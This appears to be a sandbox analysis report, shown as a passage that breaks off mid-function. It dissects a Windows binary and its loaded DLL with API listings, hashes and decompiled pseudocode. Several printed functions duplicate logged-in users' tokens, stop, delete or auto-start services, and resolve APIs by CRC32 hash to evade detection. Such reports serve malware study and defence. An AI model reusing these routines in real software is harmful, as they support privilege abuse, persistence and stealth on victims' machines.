                                                                                                        0x70983727
                                                                                                        0x7098372d
                                                                                                        0x70983738
                                                                                                        0x70983738
                                                                                                        0x7098371c
                                                                                                        0x709836e9
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70983695
                                                                                                        0x70983635
                                                                                                        0x00000000
                                                                                                        0x70983697
                                                                                                        0x7098369c
                                                                                                        0x709836a2
                                                                                                        0x709836a3
                                                                                                        0x709836b5
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • WTSEnumerateSessionsW.WTSAPI32(00000000,00000000,00000001,?,?,00000000,74B04F20,?,00000000,?,00000000,74B04F20), ref: 7098362E
                                                                                                        • WTSQuerySessionInformationW.WTSAPI32(00000000,?,00000008,?,?,00000000,74B04F20,?,00000000,?,00000000,74B04F20), ref: 70983672
                                                                                                        • WTSFreeMemory.WTSAPI32(?,00000000,?,00000008,?,?,00000000,74B04F20,?,00000000,?,00000000,74B04F20), ref: 7098368C
                                                                                                        • Sleep.KERNEL32(000001F4,00000000,?,00000008,?,?,00000000,74B04F20,?,00000000,?,00000000,74B04F20), ref: 7098369C
                                                                                                        • WTSQueryUserToken.WTSAPI32(?,?,?,00000000,?,00000008,?,?,00000000,74B04F20,?,00000000,?,00000000,74B04F20), ref: 709836C0
                                                                                                        • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000001,00000001,?,?,?,?,00000000,?,00000008,?,?,00000000,74B04F20), ref: 709836E1
                                                                                                        • RtlZeroMemory.NTDLL(?,00000004), ref: 709836F6
                                                                                                        • GetTokenInformation.ADVAPI32(?,00000013(TokenIntegrityLevel),00000004,00000004,?,?,00000004,?,00000000,?,00000000,74B04F20), ref: 7098370E
                                                                                                        • CloseHandle.KERNEL32(?,?,00000000,?,00000000,74B04F20), ref: 7098372D
                                                                                                        • CloseHandle.KERNEL32(?,?,00000000,?,00000000,74B04F20), ref: 7098373E
                                                                                                        • CloseHandle.KERNEL32(?,?,00000000,?,00000000,74B04F20), ref: 70983749
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandleToken$InformationMemoryQuery$DuplicateEnumerateFreeSessionSessionsSleepUserZero
                                                                                                        • String ID:
                                                                                                        • API String ID: 935900411-0
                                                                                                        • Opcode ID: 35ed1ad82b2044956dd60122e790e9b837209af13fee578bdd43b43813613b38
                                                                                                        • Instruction ID: 6a44722b9f78f330e7dc3e0aac8f24024f6b2f06b84b1107958b4c834777778f
                                                                                                        • Opcode Fuzzy Hash: 35ed1ad82b2044956dd60122e790e9b837209af13fee578bdd43b43813613b38
                                                                                                        • Instruction Fuzzy Hash: 59415FB2208341ABD700DF59DD81A5FB3E9FB88754F044A2DF64297390E774E9088BA3
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00542FF5, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 49libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(KERNEL32.DLL,007D5B80,0000000C,00543106,00000000,00000000,?,00000000,005406A9,00539730,00000001,00542E13,?,00000000), ref: 00543006
                                                                                                        • GetProcAddress.KERNEL32(?,EncodePointer), ref: 0054303A
                                                                                                        • GetProcAddress.KERNEL32(?,DecodePointer), ref: 0054304A
                                                                                                        • InterlockedIncrement.KERNEL32(00810930), ref: 0054306C
                                                                                                        • __lock.LIBCMT ref: 00543074
                                                                                                        • ___addlocaleref.LIBCMT ref: 00543093
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$HandleIncrementInterlockedModule___addlocaleref__lock
                                                                                                        • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                        • API String ID: 1036688887-2843748187
                                                                                                        • Opcode ID: c01f8acd3310a24695a5151a321d5fe1f626f379c3c02e4288bed02d3288a819
                                                                                                        • Instruction ID: 1ad7195023f7f6c93f75cd988223e0a62fa84837ca15660bb2df02e592adb840
                                                                                                        • Opcode Fuzzy Hash: c01f8acd3310a24695a5151a321d5fe1f626f379c3c02e4288bed02d3288a819
                                                                                                        • Instruction Fuzzy Hash: E31191B09407029FEB209F75C809BDABFE4FF44315F10852DE899963A1DBB8AA41CF51
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70983850, Relevance: 15.1, APIs: 10, Instructions: 76servicesleepCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E70983850(short* _a4, intOrPtr _a8) {
				intOrPtr _v24;
				struct _SERVICE_STATUS _v28;
				int _v32;
				short* _t12;
				void* _t24;
				void* _t28;
				void* _t31;
				int _t32;

				_t32 = 0;
				_v32 = 0;
				_t12 = OpenSCManagerW(0, 0, 0xf003f);
				_t24 = _t12;
				if(_t24 != 0) {
					L2:
					_t28 = OpenServiceW(_t24, _a4, 0xf01ff);
					if(_t28 == 0) {
						L13:
						CloseServiceHandle(_t24);
						L14:
						return _t32;
					}
					QueryServiceStatus(_t28,  &_v28);
					if(_v24 == 1) {
						L9:
						if(_a8 != 0) {
							_v32 = DeleteService(_t28);
						} else {
							_v32 = 1;
						}
						L12:
						CloseServiceHandle(_t28);
						_t32 = _v32;
						goto L13;
					}
					if(ControlService(_t28, 1,  &_v28) == 0) {
						goto L12;
					}
					_t31 = 0;
					while(1) {
						QueryServiceStatus(_t28,  &_v28);
						if(_v24 == 1) {
							goto L9;
						}
						Sleep(0x3e8);
						_t31 = _t31 + 1;
						if(_t31 < 0x3c) {
							continue;
						}
						goto L12;
					}
					goto L9;
				}
				_t24 = OpenSCManagerW(_t12, _t12, 1);
				if(_t24 == 0) {
					goto L14;
				}
				goto L2;
			}











                                                                                                        0x7098385c
                                                                                                        0x70983865
                                                                                                        0x70983869
                                                                                                        0x7098386b
                                                                                                        0x7098386f
                                                                                                        0x70983881
                                                                                                        0x70983893
                                                                                                        0x70983897
                                                                                                        0x7098390f
                                                                                                        0x70983910
                                                                                                        0x70983918
                                                                                                        0x7098391f
                                                                                                        0x7098391f
                                                                                                        0x7098389f
                                                                                                        0x709838aa
                                                                                                        0x709838e8
                                                                                                        0x709838ed
                                                                                                        0x70983900
                                                                                                        0x709838ef
                                                                                                        0x709838ef
                                                                                                        0x709838ef
                                                                                                        0x70983904
                                                                                                        0x70983905
                                                                                                        0x7098390b
                                                                                                        0x00000000
                                                                                                        0x7098390b
                                                                                                        0x709838bc
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x709838c4
                                                                                                        0x709838c6
                                                                                                        0x709838cc
                                                                                                        0x709838d7
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x709838de
                                                                                                        0x709838e0
                                                                                                        0x709838e4
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x709838e6
                                                                                                        0x00000000
                                                                                                        0x709838c6
                                                                                                        0x70983877
                                                                                                        0x7098387b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,750D2940,?,?,?,?,?,?,?,709843BE,00000000), ref: 70983869
                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000001,?,?,?,?,?,?,?,709843BE,00000000), ref: 70983875
                                                                                                        • OpenServiceW.ADVAPI32(00000000,?,000F01FF,?,?,?,?,?,?,?,?,709843BE,00000000), ref: 7098388D
                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,709843BE,00000000), ref: 7098389F
                                                                                                        • ControlService.ADVAPI32(00000000,00000001,?), ref: 709838B4
                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 709838CC
                                                                                                        • Sleep.KERNEL32(000003E8), ref: 709838DE
                                                                                                        • DeleteService.ADVAPI32(00000000), ref: 709838FA
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 70983905
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,?,709843BE,00000000), ref: 70983910
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Service$Open$CloseHandleManagerQueryStatus$ControlDeleteSleep
                                                                                                        • String ID:
                                                                                                        • API String ID: 3264530519-0
                                                                                                        • Opcode ID: fb8774b8859cd379b8a5c7873dfb2314d93266d657332774b548cb1bc2cd8659
                                                                                                        • Instruction ID: 72d8fa8917945177f01b41c9f3e9a93b176ec162092e6d5d9959f981b1f0cf7c
                                                                                                        • Opcode Fuzzy Hash: fb8774b8859cd379b8a5c7873dfb2314d93266d657332774b548cb1bc2cd8659
                                                                                                        • Instruction Fuzzy Hash: C62192B2158305EBD7019F558C88B3F7BACEB89644F10042DF90293390DBB5D9489AA3
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004BF7E6, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 190networkCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 004BF7ED
                                                                                                        • InternetQueryOptionW.WININET(00000000,0000004B,?,?), ref: 004BF826
                                                                                                        • GetLastError.KERNEL32(00000000), ref: 004BF831
                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,00506D47,PingThread,00000000,00000068), ref: 004A1B28
                                                                                                          • Part of subcall function 004BEF63: __EH_prolog3.LIBCMT ref: 004BEF6A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3$CriticalErrorInitializeInternetLastOptionQuerySection
                                                                                                        • String ID: , m_Proxy.Proxy_Exceptions == $InternetQueryOption failed! (%d)$http=$m_Proxy.IPIE ==
                                                                                                        • API String ID: 1508298941-2056814762
                                                                                                        • Opcode ID: 3cade6625725751ac44e329fea558da468a59334d557caa5ff153a6ba0af59a9
                                                                                                        • Instruction ID: 9ad1b6df3386e347a72d3cb7093f428499c490254f7866096eee2b8184655fb1
                                                                                                        • Opcode Fuzzy Hash: 3cade6625725751ac44e329fea558da468a59334d557caa5ff153a6ba0af59a9
                                                                                                        • Instruction Fuzzy Hash: E571AFB0A00218ABDF14EBA5CD92AEDB779BB25304F50416EE11AB31D1DB785F05CB68
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004B878E, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 82threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 004B8798
                                                                                                          • Part of subcall function 004B91EF: _memset.LIBCMT ref: 004B9216
                                                                                                          • Part of subcall function 004B91EF: GetVersionExW.KERNEL32(?,?,00000001), ref: 004B9231
                                                                                                          • Part of subcall function 004B91EF: GetVersionExW.KERNEL32(?,?,00000001), ref: 004B9248
                                                                                                        • OpenDesktopW.USER32(?,00000000,00000001,10000000), ref: 004B87DF
                                                                                                        • SetThreadDesktop.USER32(00000000), ref: 004B87EC
                                                                                                        • GetLastError.KERNEL32 ref: 004B87F6
                                                                                                        • CloseDesktop.USER32(00000000), ref: 004B8845
                                                                                                        • GetLastError.KERNEL32 ref: 004B884D
                                                                                                          • Part of subcall function 00404186: __EH_prolog3.LIBCMT ref: 0040418D
                                                                                                          • Part of subcall function 004B58B0: __EH_prolog3_GS.LIBCMT ref: 004B58B7
                                                                                                          • Part of subcall function 00401504: __EH_prolog3.LIBCMT ref: 0040150B
                                                                                                        Strings
                                                                                                        • ChangeThreadDesktop(): SetThreadDesktop failed for %1%: %2% (.\TVObject.cpp, 612), xrefs: 004B87FC
                                                                                                        • ChangeThreadDesktop(): OpenDesktop failed for Desktop %1%: %2% (.\TVObject.cpp, 624), xrefs: 004B8853
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: DesktopH_prolog3$ErrorLastVersion$CloseH_prolog3_OpenThread_memset
                                                                                                        • String ID: ChangeThreadDesktop(): OpenDesktop failed for Desktop %1%: %2% (.\TVObject.cpp, 624)$ChangeThreadDesktop(): SetThreadDesktop failed for %1%: %2% (.\TVObject.cpp, 612)
                                                                                                        • API String ID: 1813351611-2669621406
                                                                                                        • Opcode ID: 0a300e605ceb4900eae422976824c56eaa3e9e874d3f96fad598482370b1002a
                                                                                                        • Instruction ID: 341cb4497560b5c40c3de215531c3c48982386b9da47b8e32fb245829e8f1ba8
                                                                                                        • Opcode Fuzzy Hash: 0a300e605ceb4900eae422976824c56eaa3e9e874d3f96fad598482370b1002a
                                                                                                        • Instruction Fuzzy Hash: 04317071C01288EADF11EBB4CC5AAEEBB38AF10344F54849EF54567282DB788B45C776
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70981E40, Relevance: 13.6, APIs: 9, Instructions: 147stringlibraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 94%
                                                                                                        			E70981E40() {
				short _t58;
				signed int _t60;
				signed int _t61;
				signed int _t63;
				signed int _t72;
				signed int _t73;
				intOrPtr _t77;
				signed int _t78;
				CHAR* _t80;
				signed int _t83;
				signed int _t89;
				intOrPtr* _t90;
				char* _t96;
				intOrPtr* _t101;
				char* _t103;
				CHAR* _t106;
				char* _t108;
				CHAR* _t109;
				short _t112;
				struct HINSTANCE__* _t115;
				void* _t116;

				_t101 =  *((intOrPtr*)(_t116 + 0x3c));
				_t58 = 1;
				 *(_t116 + 0x14) = 1;
				if(_t101 == 0 ||  *_t101 != 0x5a4d) {
					L28:
					return _t58;
				} else {
					_t83 =  *((intOrPtr*)(_t101 + 0x3c)) + _t101;
					 *(_t116 + 0x24) = _t83;
					if( *_t83 != 0x4550) {
						goto L28;
					}
					_t77 =  *((intOrPtr*)(_t83 + 0x78));
					_t78 = _t77 + _t101;
					 *(_t116 + 0x24) =  *((intOrPtr*)(_t77 + _t101 + 0x1c)) + _t101;
					 *(_t116 + 0x20) =  *((intOrPtr*)(_t78 + 0x24)) + _t101;
					_t89 =  *((intOrPtr*)(_t78 + 0x20)) + _t101;
					 *(_t116 + 0x14) = _t78;
					 *(_t116 + 0x1c) = _t89;
					 *(_t116 + 0xc) = 0;
					if( *((intOrPtr*)(_t78 + 0x18)) <= 0) {
						L27:
						return _t58;
					}
					while(1) {
						_t106 =  *((intOrPtr*)(_t89 +  *(_t116 + 0x14) * 4)) + _t101;
						_t60 = RtlComputeCrc32(0, _t106, lstrlenA(_t106));
						_t96 =  *(_t116 + 0x50);
						_t61 = _t60 ^  *(_t116 + 0x54);
						_t112 = 0;
						if(_t96 <= 0) {
							goto L25;
						}
						_t90 =  *((intOrPtr*)(_t116 + 0x4c));
						while(_t61 !=  *_t90) {
							_t112 = _t112 + 1;
							_t90 = _t90 + 0x10;
							if(_t112 < _t96) {
								continue;
							}
							goto L25;
						}
						_t103 =  *((intOrPtr*)( *((intOrPtr*)(_t116 + 0x2c)) + ( *( *((intOrPtr*)(_t116 + 0x28)) +  *(_t116 + 0x14) * 2) & 0x0000ffff) * 4)) +  *((intOrPtr*)(_t116 + 0x48));
						 *((intOrPtr*)(_t116 + 0x10)) = _t112;
						if(_t103 == 0 || _t103 < _t78 || _t103 >=  *((intOrPtr*)( *((intOrPtr*)(_t116 + 0x30)) + 0x7c)) + _t78) {
							L22:
							 *( *((intOrPtr*)(_t116 + 0x4c)) + 0xc + (_t112 + _t112) * 8) = _t103;
							_t101 =  *((intOrPtr*)(_t116 + 0x48));
							if(_t103 == 0) {
								 *(_t116 + 0x20) = 0;
							}
						} else {
							_t80 = StrDupA(_t103);
							if(_t80 == 0) {
								L24:
								_t78 =  *(_t116 + 0x1c);
								_t101 =  *((intOrPtr*)(_t116 + 0x48));
								goto L25;
							}
							 *(_t116 + 0x20) = 0;
							_t108 = StrChrA(_t80, 0x2e);
							if(_t108 == 0) {
								L20:
								LocalFree(_t80);
								if( *((intOrPtr*)(_t116 + 0x18)) == 0) {
									goto L24;
								}
								_t78 =  *(_t116 + 0x1c);
								goto L22;
							}
							 *_t108 = 0;
							_t109 = _t108 + 1;
							_t115 = GetModuleHandleA(_t80);
							if(_t115 != 0) {
								L18:
								 *(_t116 + 0x1c) = 1;
								_t72 = RtlComputeCrc32(0, _t109, lstrlenA(_t109));
								_t73 =  *(_t116 + 0x54);
								_push(_t73);
								_push(0x10);
								_push(_t116 + 0x3c);
								_push(_t115);
								 *(_t116 + 0x44) = _t72 ^ _t73;
								 *((intOrPtr*)(_t116 + 0x48)) = 0;
								 *((intOrPtr*)(_t116 + 0x4c)) = 0;
								 *(_t116 + 0x50) = 0;
								E70981E40();
								_t103 =  *(_t116 + 0x50);
								_t116 = _t116 + 0x10;
								L19:
								_t112 =  *((intOrPtr*)(_t116 + 0x10));
								goto L20;
							}
							_t115 = LoadLibraryA(_t80);
							if(_t115 == 0) {
								goto L19;
							}
							goto L18;
						}
						L25:
						_t63 =  *(_t116 + 0x14) + 1;
						 *(_t116 + 0x14) = _t63;
						if(_t63 <  *((intOrPtr*)(_t78 + 0x18))) {
							_t89 =  *(_t116 + 0x24);
							continue;
						}
						_t58 =  *(_t116 + 0x20);
						goto L27;
					}
				}
			}
























                                                                                                        0x70981e44
                                                                                                        0x70981e48
                                                                                                        0x70981e4d
                                                                                                        0x70981e53
                                                                                                        0x70982021
                                                                                                        0x70982021
                                                                                                        0x70981e67
                                                                                                        0x70981e6a
                                                                                                        0x70981e72
                                                                                                        0x70981e76
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70981e7d
                                                                                                        0x70981e84
                                                                                                        0x70981e88
                                                                                                        0x70981e91
                                                                                                        0x70981e98
                                                                                                        0x70981e9e
                                                                                                        0x70981ea2
                                                                                                        0x70981ea6
                                                                                                        0x70981eae
                                                                                                        0x7098201c
                                                                                                        0x00000000
                                                                                                        0x7098201c
                                                                                                        0x70981ec4
                                                                                                        0x70981ecb
                                                                                                        0x70981ed8
                                                                                                        0x70981edd
                                                                                                        0x70981ee1
                                                                                                        0x70981ee5
                                                                                                        0x70981ee9
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70981eef
                                                                                                        0x70981ef3
                                                                                                        0x70981ef7
                                                                                                        0x70981ef8
                                                                                                        0x70981efd
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70981eff
                                                                                                        0x70981f17
                                                                                                        0x70981f1b
                                                                                                        0x70981f1f
                                                                                                        0x70981fe0
                                                                                                        0x70981fe6
                                                                                                        0x70981fec
                                                                                                        0x70981ff0
                                                                                                        0x70981ff2
                                                                                                        0x70981ff2
                                                                                                        0x70981f3e
                                                                                                        0x70981f45
                                                                                                        0x70981f49
                                                                                                        0x70981ffc
                                                                                                        0x70981ffc
                                                                                                        0x70982000
                                                                                                        0x00000000
                                                                                                        0x70982000
                                                                                                        0x70981f52
                                                                                                        0x70981f60
                                                                                                        0x70981f64
                                                                                                        0x70981fce
                                                                                                        0x70981fcf
                                                                                                        0x70981fda
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70981fdc
                                                                                                        0x00000000
                                                                                                        0x70981fdc
                                                                                                        0x70981f66
                                                                                                        0x70981f6a
                                                                                                        0x70981f71
                                                                                                        0x70981f75
                                                                                                        0x70981f84
                                                                                                        0x70981f85
                                                                                                        0x70981f98
                                                                                                        0x70981f9f
                                                                                                        0x70981fa3
                                                                                                        0x70981fa4
                                                                                                        0x70981faa
                                                                                                        0x70981fad
                                                                                                        0x70981fae
                                                                                                        0x70981fb2
                                                                                                        0x70981fb6
                                                                                                        0x70981fba
                                                                                                        0x70981fbe
                                                                                                        0x70981fc3
                                                                                                        0x70981fc7
                                                                                                        0x70981fca
                                                                                                        0x70981fca
                                                                                                        0x00000000
                                                                                                        0x70981fca
                                                                                                        0x70981f7e
                                                                                                        0x70981f82
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70981f82
                                                                                                        0x70982004
                                                                                                        0x70982008
                                                                                                        0x70982009
                                                                                                        0x70982010
                                                                                                        0x70981ec0
                                                                                                        0x00000000
                                                                                                        0x70981ec0
                                                                                                        0x70982016
                                                                                                        0x00000000
                                                                                                        0x7098201b
                                                                                                        0x70981ec4

                                                                                                        APIs
                                                                                                        • lstrlenA.KERNEL32(00000100,00000100,00000000,?,?,?,?,?,70989143), ref: 70981ECE
                                                                                                        • RtlComputeCrc32.NTDLL ref: 70981ED8
                                                                                                        • StrDupA.SHLWAPI(?,00000000,00000100,00000000,?,?,?,?,?,70989143), ref: 70981F3F
                                                                                                        • StrChrA.SHLWAPI(?,?,?,00000000,0000002E,?,?,?,?,?,70989143), ref: 70981F5A
                                                                                                        • GetModuleHandleA.KERNEL32(00000000,?,?,?,00000000,0000002E,?,?,?,?,?,70989143), ref: 70981F6B
                                                                                                        • LoadLibraryA.KERNEL32(00000000,?,?,?,00000000,0000002E,?,?,?,?,?,70989143), ref: 70981F78
                                                                                                        • lstrlenA.KERNEL32(00000001,?,?,?,00000000,0000002E,?,?,?,?,?,70989143), ref: 70981F8D
                                                                                                        • RtlComputeCrc32.NTDLL ref: 70981F98
                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,00000000,0000002E,?,?,?,?,?,70989143), ref: 70981FCF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: ComputeCrc32lstrlen$FreeHandleLibraryLoadLocalModule
                                                                                                        • String ID:
                                                                                                        • API String ID: 1770823755-0
                                                                                                        • Opcode ID: c19139ccac08119deb3562ffcbea3c69a3c37fcfa05a8c7deaeaafbc1b04aa14
                                                                                                        • Instruction ID: 15c069c27ccb2da21223200f77bc45301237152441465dd005028623a55f4781
                                                                                                        • Opcode Fuzzy Hash: c19139ccac08119deb3562ffcbea3c69a3c37fcfa05a8c7deaeaafbc1b04aa14
                                                                                                        • Instruction Fuzzy Hash: 7F5114B12083058FC304DF59C884A5EB7EAEF89708F14492DE99697392D7B5E801CB96
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70983920, Relevance: 13.6, APIs: 9, Instructions: 80memoryserviceCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E70983920(int _a4, short** _a8, int _a12) {
				intOrPtr _v24;
				struct _SERVICE_STATUS _v28;
				int _t14;
				long _t18;
				int _t26;
				void* _t31;
				void* _t33;

				_t31 = _a4;
				if(_t31 == 0) {
					return 0;
				} else {
					_a4 = 0;
					if(QueryServiceConfigW(_t31, 0, 0,  &_a4) != 0) {
						_t18 = _a4;
						_t26 = _t18;
						_t33 = HeapAlloc(GetProcessHeap(), 8, _t18);
						if(_t33 != 0) {
							if(QueryServiceConfigW(_t31, _t33, _t26,  &_a4) != 0 &&  *((intOrPtr*)(_t33 + 4)) != 2) {
								ChangeServiceConfigW(_t31, 0xffffffff, 2, 0xffffffff, 0, 0, 0, 0, 0, 0, 0);
							}
							HeapFree(GetProcessHeap(), 0, _t33);
						}
					}
